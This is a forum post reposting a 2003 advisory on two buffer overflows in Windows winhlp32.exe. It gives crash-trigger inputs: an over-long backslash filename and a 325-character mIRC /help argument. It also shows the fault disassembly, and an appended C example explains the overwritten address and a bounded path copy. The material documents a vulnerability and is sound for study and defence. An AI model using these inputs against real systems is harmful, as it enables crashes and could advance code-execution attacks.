NI3
11-01-2003, 05:18 PM
hi all
---
Winhlp32.exe 5.1.2600.1106 buffer overflow
=
=
= Affected Software:
= Microsoft Windows nt 4.0
= Microsoft Windows 2000
= Microsoft Windows Xp
=
= by Dr_insane
=
===========================================================================================
Two buffer overflows have been discovered in winhlp32.exe that affect all versions of Windows.
Winhlp32.exe cannot handle some long filenames and some strange path names and as a result it will crash.
The vulnerabilities may allow arbitrary code to be run on a Windows NT machine.
Description:
------------
[1] The first buffer overflow occurs when winhlp32.exe attempts to open a strange long filename. If the filename is
about 259 bytes, winhlp32.exe will crash by producing an error message.
[2] The second buffer overflow occurs when trying to run winhlp32.exe via mIRC.
Exploit:
---------
[1] Open winhlp32.exe and insert as a filename the following string:
\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a
\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a
\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a
\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a
Most of the time winhlp32 will crash and the following error message will be produced:
(sometimes instead of crashing the open window will just disappear!)
"The instruction at "0x631b3597" referenced memory at "0x000fb964".The memory could't be "read".
By disassembling winhlp32.exe we get:
"Unhandled exception in winhlp32.exe (SHLWAPI.dll): 0xC0000005: Access violation"
631B3599 xor edx,edx
631B359B test ecx,ecx
631B359D je 631B35CB
631B359F mov ax,word ptr [ecx]
631B35A2 test ax,ax
631B35A5 je 631B35CB
631B35A7 movzx eax,ax
631B35AA cmp eax,20h
*****The character "\" does the trick.******
[2] The second buffer overflow occurs when we open MIRC and supply the following command:
/help * [325 characters]
Mirc will call the file winhlp32.exe and will try to open the file specified (325 chars in our case).
Winhlp32.exe will crash again and the error message will be:
"The instruction at "0x0102fd40" referenced memory at "0x61616161".The memory could't be "WRITTEN".
By disassembling winhlp32.exe we get:
"Unhandled exception in winhlp32.exe (SHLWAPI.dll): 0xC0000005: Access violation"
0102FD40 mov dword ptr [ecx],1002AF4h
0102FD46 call 0102E8D2
0102FD4B ret
0102FD4C cmp dword ptr [esp+8],0
0102FD51 jne 0102FD57
pr00f of concept exploit:
--------------------------
Not yet
== Credit ==
Dr_insane
----
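As an added illustration (not part of the advisory or this post), the C program below shows how the second crash's fault address is read during triage. It assumes the 325-character /help argument was 325 'a' bytes (0x61), so that the bytes spilling past a 260-byte MAX_PATH buffer spell 0x61616161, the very address the faulting `mov dword ptr [ecx],...` then writes through; `copy_path_bounded` is the length-checked copy a hardened handler would use instead, and `fault_address_is_text` is a simple triage heuristic, not winhlp32's code.

```c
/* Added example: interpreting a fault address of 0x61616161 and the
 * bounded copy that prevents the overflow. Assumption: the advisory's
 * 325-character argument consists of 'a' (0x61) bytes. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MAX_PATH 260   /* Win32 path buffer size, including the NUL */

/* Bounded copy: returns 0 on success, -1 if src (plus NUL) would not fit.
 * An unchecked strcpy into a char[MAX_PATH] is the pattern that lets a
 * 325-byte argument run past the buffer into whatever follows it. */
int copy_path_bounded(char *dst, size_t dstlen, const char *src) {
    size_t n = strlen(src);
    if (n + 1 > dstlen) return -1;
    memcpy(dst, src, n + 1);
    return 0;
}

/* Triage heuristic: if every byte of a fault address is printable ASCII,
 * the pointer was most likely overwritten by attacker-controlled text. */
int fault_address_is_text(uint32_t addr) {
    for (int i = 0; i < 4; i++) {
        unsigned char b = (unsigned char)((addr >> (8 * i)) & 0xff);
        if (b < 0x20 || b > 0x7e) return 0;
    }
    return 1;
}

/* The 32-bit little-endian value that an over-long input would leave at
 * byte offset `off` from the start of the buffer, i.e. what a pointer
 * stored right after a 260-byte buffer (off == 260) would become. */
uint32_t overflow_value_at(const char *input, size_t off) {
    uint32_t v = 0;
    for (int i = 0; i < 4; i++)
        v |= (uint32_t)(unsigned char)input[off + i] << (8 * i);
    return v;
}

int main(void) {
    char arg[326];                      /* constructed: 325 x 'a' */
    memset(arg, 'a', 325);
    arg[325] = '\0';
    char buf[MAX_PATH];
    printf("bounded copy of 325-byte arg: %d\n", copy_path_bounded(buf, sizeof buf, arg));
    printf("value landing at offset %d: 0x%08x\n", MAX_PATH, overflow_value_at(arg, MAX_PATH));
    printf("0x61616161 looks like text: %d\n", fault_address_is_text(0x61616161u));
    return 0;
}
```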
